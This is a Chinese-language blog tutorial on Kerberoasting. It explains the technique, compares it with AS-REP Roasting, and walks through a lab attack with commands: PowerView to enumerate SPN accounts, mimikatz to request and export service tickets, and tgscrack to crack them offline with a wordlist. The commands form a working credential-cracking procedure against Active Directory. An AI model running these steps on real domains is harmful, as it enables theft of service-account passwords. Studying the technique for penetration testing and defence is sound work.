Kerberoasting 离线爆破攻击

当域用户请求某个域内服务后,kdc 通常会返回一个加密的 st 服务票据,此 st 服务票据被服务 hash 加密,当我们将使用密码字典派生的多个 hash 值来尝试解密 st 服务票据,如果能够揭秘成功,则说明字典中存在目标服务账号的密码。

Kerberoasting 对比 AS-REP Roasting

  • Kerberoasting 利用后获得服务账户密码,AS-REP Roasting 利用后获得发起请求的域用户的密码。

  • Kerberoasting 使用字典爆破 st 服务票据,AS-REP Roasting 使用字典爆破 Logon Session Key。

  • Kerberoasting 需要攻击者具有请求 st 的凭据(某个域用户即可),AS-REP Roasting 需要攻击者枚举出域中 "不要求 kerberos 预身份验证" 的用户。

环境搭建

为管理员 administrator 注册一个 spn,目的是为了 administrator 映射为某个服务的服务账户。

复制代码
setspn -S MySQL/WIN-0v0GAORDC17:3306/MySQL administrator

漏洞利用

  1. 查询域内注册 spn 的用户。工具:PowerView.ps1 ,项目地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
复制代码
Import-Module .\PowerView.ps1 
Get-NetUser -SPN
  1. 使用某个域用户凭据请求这个 spn 对应服务的 st 服务票据。工具:mimikatz
复制代码
kerberos::ask /target:MySQL/WIN-0v0GAORDC17:3306/MySQL
​
# 这里我用来请求 st 的凭据时 administrator管理员,其实其他域用户凭据也可以,只要能请求到 st 就可以。
  1. 导出请求到的 st 服务票据。工具:mimikatz
复制代码
kerberos::list /export
  1. 使用字典进行离线爆破。工具:tgscrack ,项目地址:https://github.com/leechristensen/tgscrack
复制代码
# 先使用 python 脚本提取出 st 服务票据的加密部分,并导出到 /tmp/myhash.txt 路径下
python2 extractServiceTicketParts.py ticket.kirbi > /tmp/myhash.txt
​
# 再使用 tgscrack.go 进行离线爆破
go run tgscrack.go -hashfile /tmp/myhash.txt -wordlist /tmp/password.txt
相关推荐
scilwb4 分钟前
占用栅格地图数据集
数据库
码农12138号14 分钟前
BUUCTF在线评测-练习场-WebCTF习题[GYCTF2020]Blacklist1-flag获取、解析
web安全·网络安全·ctf·sql注入·handler·buuctf
Linux运维技术栈16 分钟前
企业级配置:Azure 邮件与 Cloudflare 域名解析的安全验证落地详解
运维·安全·flask·azure·cloudflare
阿酷tony22 分钟前
微软语音合成标记语言SSML文档结构和事件(详细文档和实例)
microsoft·微软语音·ssml文档结构·ssml结构·ssml语音合成
知北游天35 分钟前
Linux:多线程---同步&&生产者消费者模型
java·linux·网络
EasyCVR36 分钟前
EasyCVR视频汇聚平台国标接入设备TCP主动播放失败排查指南
网络·tcp/ip·音视频
时序数据说1 小时前
时序数据库的存储之道:从数据特性看技术要点
大数据·数据库·物联网·开源·时序数据库·iotdb
刘孬孬沉迷学习1 小时前
5G标准学习笔记15 --CSI-RS测量
网络·笔记·学习·5g·信息与通信·信号处理
敲上瘾1 小时前
传输层协议UDP原理
linux·c语言·网络·网络协议·udp
鸥梨菌Honevid2 小时前
QT解析文本框数据——概述
数据库·qt·mysql